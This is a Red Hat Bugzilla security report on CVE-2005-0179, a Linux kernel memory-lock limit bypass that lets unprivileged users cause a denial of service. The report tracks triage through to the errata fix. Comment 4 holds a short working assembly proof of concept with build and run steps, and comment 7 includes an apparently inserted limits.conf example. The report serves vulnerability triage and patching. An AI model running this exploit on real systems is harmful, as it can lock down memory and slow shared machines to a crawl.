Bug 144524

Summary: CVE-2005-0179 RLIMIT_MEMLOCK bypass and (2.6) unprivileged user DoS
Product: Red Hat Enterprise Linux 3
Reporter: Josh Bressers <bressers>
Component: kernel
Assignee: Jason Baron <jbaron>
Status: CLOSED ERRATA
QA Contact: Brian Brock <bbrock>
Severity: medium
Priority: medium
Version: 3.0
CC: anderson, jbaron, jparadis, knoel, peterm, petrides, riel, sct
Keywords: Security
Hardware: All
OS: Linux
Whiteboard: public=20060107,impact=moderate
Fixed In Version: RHSA-2005-663
Doc Type: Bug Fix
Last Closed: 2005-09-28 14:41:03 UTC
Bug Blocks: 156320
Attachments: Proposed fix for this issue

Description Josh Bressers 2005-01-07 22:08:48 UTC
This was reported by grsecurity to full-disclosure
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html

the 'culprit' patch is how the default RLIM_MEMLOCK and the privilege
to call mlockall have changed in 2.6.9. namely, the former has been
reduced to 32 pages while the latter has been relaxed to allow it for
otherwise unprivileged users if their RLIM_MEMLOCK is bigger than the
currently allocated vm. which is normally good enough, except as you
now know there's a path that can increase the allocated vm without
checking for RLIM_MEMLOCK.

Comment 1 Josh Bressers 2005-01-07 22:08:48 UTC
Created attachment 109501 [details]
Proposed fix for this issue

Comment 3 Dave Anderson 2005-03-30 21:36:55 UTC
Can we get a reproducer?  If we mlock a stack page and then
increase the stack size, separate vma's get created, with the
previously locked stack page getting its own vma.  So it's not
clear how expand_stack() is being called in a way that can be
exploited.

The link in comment #1 does not respond.


Comment 4 Dave Anderson 2005-03-30 22:52:09 UTC
Jason Baron forwarded this as the reproducer:

> 6) 2.4/2.6 RLIMIT_MEMLOCK bypass and (2.6) unprivileged user DoS
>
> Taken from the mail from the PaX team to Linus and Andrew Morton:
>
> the 'culprit' patch is how the default RLIM_MEMLOCK and the privilege
> to call mlockall have changed in 2.6.9. namely, the former has been
> reduced to 32 pages while the latter has been relaxed to allow it for
> otherwise unprivileged users if their RLIM_MEMLOCK is bigger than the
> currently allocated vm. which is normally good enough, except as you
> now know there's a path that can increase the allocated vm without
> checking for RLIM_MEMLOCK.
>
> i'm attaching a small i386-specific demonstration, use the makefile to
> create the small self-contained executable, e.g., 'make alloc=0x100000'
> to have it allocate 1MB of stack and lock all of it. for demonstrating
> the full effect of locking down arbitrary amounts of memory, you'll have
> to set your stack rlimit to infinity (ulimit -s unlimited) and allocate
> as much memory as your memory overcommit policy allows (this may mean
> that you'll have to run multiple instances, if you have lots of memory).
>
> surprisingly, in my tests the kernel survived pretty well, it just crawled
> to a snail's speed as every mapped page access required disk i/o ;-). i
> didn't play with overcommit policies nor any special workloads, so there
> may very well be worse effects with that much locked memory. in any case,
> this may warrant 2.6.10.1 because as soon as the fix goes into -bk, anyone
> reading the logs can easily figure it out and reproduce the 'exploit'.
>
> the attached patch is the excerpt from PaX that survives the exploit, so
> i think it's good to go.

Here's the little mlock-dos.S assembly program:

;nasm -f elf mlock-dos.S
;ld -static mlock-dos.o

bits 32

%define MCL_CURRENT     1
%define MCL_FUTURE      2
%define __NR_mlockall   152

section .text
global _start
_start:
        mov     ebx,MCL_CURRENT | MCL_FUTURE
        mov     eax,__NR_mlockall
        int     0x80
        sub     esp,ALLOCATE
        mov     edi,esp
        mov     ecx,ALLOCATE
        cld
        rep     stosb
.x:
        jmp     .x

Following the directions:

$ ulimit -s unlimited
$ make alloc=0x100000
nasm -f elf -DALLOCATE=0x100000 mlock-dos.S
ld -static mlock-dos.o
$ a.out

Then looking at the a.out VM from crash:

crash> vm 11106
PID: 11106  TASK: cbda4000  CPU: 1   COMMAND: "a.out"
   MM       PGD      RSS    TOTAL_VM
d5c00500  dff59600  1036k    1040k
  VMA       START      END    FLAGS  FILE
d22eaf9c   8048000   8049000   1875  /tmp/a.out
cd7f38b4  bfefd000  c0000000 100177
crash>

You can see that the mlockall attempt failed, because the stack's
VMA has flags of 100177, i.e., not including VM_LOCKED (0x2000).
The text section remains unlocked as well (1875).

I'm sure I don't understand why the assembly program's mlockall()
was expected to work.  It certainly fails from a C program.

RHEL3's sys_mlockall() has this:

        lock_limit = current->rlim[RLIMIT_MEMLOCK].rlim_cur;
        lock_limit >>= PAGE_SHIFT;

        ret = -ENOMEM;
        if (current->mm->total_vm > lock_limit && !capable(CAP_IPC_LOCK))
                goto out;

Since our user RLIMIT_MEMLOCK defaults to 4096 bytes, the MCL_CURRENT|MCL_FUTURE
request to mlockall() fails immediately.  Perhaps the upstream RLIMIT_MEMLOCK
is significantly larger?


Comment 5 Dave Anderson 2005-03-30 22:58:49 UTC
It is -- in our rlimits initializer, the RLIMIT_MEMLOCK is PAGE_SIZE: 

#define INIT_RLIMITS                                    \
{                                                       \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {      _STK_LIM, RLIM_INFINITY },               \
        {             0, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {             0,             0 },               \
        {      INR_OPEN,     INR_OPEN  },               \
        {     PAGE_SIZE,     PAGE_SIZE },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
}

Upstream, it's RLIM_INFINITY:

#define INIT_RLIMITS                                    \
{                                                       \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {      _STK_LIM, RLIM_INFINITY },               \
        {             0, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {             0,             0 },               \
        {      INR_OPEN,     INR_OPEN  },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
}

That being the case, I believe this is NOTABUG.



Comment 6 Ernie Petrides 2005-03-31 03:50:14 UTC
Closing per last comment.

Comment 7 Ernie Petrides 2005-03-31 21:24:02 UTC
Reopening due to further discussion with Jason ... seems that RHEL3 kernels
would still have a problem if the sysadmin were to have raised the default
mlock rlimit (in /etc/security/limits.conf).  But I do agree with Dave in
that default installations are not exploitable.
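For illustration, a hypothetical /etc/security/limits.conf entry of the kind described, which would raise the mlock rlimit for all users (limits.conf memlock values are in KB, so 65536 is 64 MB) and thereby expose an unpatched kernel:

```
# /etc/security/limits.conf -- raise the mlock limit to 64 MB for everyone
*    soft    memlock    65536
*    hard    memlock    65536
```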

Comment 11 Ernie Petrides 2005-06-09 03:30:24 UTC
A fix for this problem has just been committed to the RHEL3 U6
patch pool this evening (in kernel version 2.4.21-32.7.EL).


Comment 17 Red Hat Bugzilla 2005-09-28 14:41:04 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2005-663.html